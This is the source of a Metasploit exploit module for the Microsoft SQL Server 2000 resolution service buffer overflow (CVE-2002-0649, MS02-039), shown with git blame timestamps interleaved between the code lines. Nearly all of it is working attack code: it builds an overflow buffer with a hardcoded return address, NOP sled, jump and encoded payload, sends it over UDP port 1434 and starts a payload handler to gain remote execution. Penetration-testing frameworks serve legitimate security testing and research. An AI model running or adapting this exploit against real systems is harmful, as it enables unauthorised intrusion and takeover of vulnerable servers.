2007-02-18 00:10:39 +00:00
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = GoodRanking
|
2005-11-26 11:16:36 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::MSSQL
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
def initialize(info = {})
|
2010-04-30 08:40:19 +00:00
|
|
|
super(update_info(info,
|
2006-09-13 06:49:39 +00:00
|
|
|
'Name' => 'Microsoft SQL Server Resolution Overflow',
|
2005-11-26 11:16:36 +00:00
|
|
|
'Description' => %q{
|
2010-04-30 08:40:19 +00:00
|
|
|
This is an exploit for the SQL Server 2000 resolution
|
2005-11-26 11:16:36 +00:00
|
|
|
service buffer overflow. This overflow is triggered by
|
|
|
|
sending a udp packet to port 1434 which starts with 0x04 and
|
|
|
|
is followed by long string terminating with a colon and a
|
|
|
|
number. This module should work against any vulnerable SQL
|
|
|
|
Server 2000 or MSDE install (pre-SP3).
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
},
|
|
|
|
'Author' => [ 'hdm' ],
|
2006-01-21 22:10:20 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2005-11-26 11:16:36 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2006-11-28 17:18:43 +00:00
|
|
|
[ 'CVE', '2002-0649'],
|
2005-11-26 11:16:36 +00:00
|
|
|
[ 'OSVDB', '4578'],
|
2009-07-16 16:02:24 +00:00
|
|
|
[ 'BID', '5310'],
|
2005-11-26 11:16:36 +00:00
|
|
|
[ 'MSB', 'MS02-039'],
|
|
|
|
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 512,
|
|
|
|
'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
2010-04-30 08:40:19 +00:00
|
|
|
'Targets' =>
|
2005-11-26 11:16:36 +00:00
|
|
|
[
|
2010-04-30 08:40:19 +00:00
|
|
|
[
|
2005-11-26 11:16:36 +00:00
|
|
|
'MSSQL 2000 / MSDE <= SP2',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x42b48774,
|
|
|
|
},
|
|
|
|
],
|
|
|
|
],
|
2006-02-21 14:27:28 +00:00
|
|
|
'Platform' => 'win',
|
2005-11-26 11:16:36 +00:00
|
|
|
'DisclosureDate' => 'Jul 24 2002',
|
|
|
|
'DefaultTarget' => 0))
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(1434)
|
|
|
|
], self.class)
|
2005-11-26 11:16:36 +00:00
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
def check
|
|
|
|
info = mssql_ping
|
|
|
|
if (info['ServerName'])
|
|
|
|
print_status("SQL Server Information:")
|
|
|
|
info.each_pair { |k,v|
|
|
|
|
print_status(" #{k + (" " * (15-k.length))} = #{v}")
|
|
|
|
}
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
connect_udp
|
|
|
|
print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
|
|
|
|
print_status("Execute 'net start sqlserveragent' once access is obtained");
|
|
|
|
|
|
|
|
# \x68:888 => push dword 0x3838383a
|
2007-03-01 08:21:36 +00:00
|
|
|
buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
# Return to the stack pointer
|
|
|
|
buf[ 97, 4] = [target.ret].pack('V')
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
# Which lands right here
|
|
|
|
buf[101, 6] = make_nops(6)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
# Jumps 8 bytes ahead
|
|
|
|
buf[107, 2] = "\xeb\x08"
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
# Write to thread storage space to avoid a crash
|
|
|
|
buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2005-11-26 11:16:36 +00:00
|
|
|
# And finally into the payload
|
|
|
|
buf[117,payload.encoded.length] = payload.encoded
|
|
|
|
|
|
|
|
udp_sock.put(buf)
|
|
|
|
|
|
|
|
disconnect_udp
|
|
|
|
handler
|
|
|
|
end
|
|
|
|
|
2009-07-16 16:02:24 +00:00
|
|
|
end
|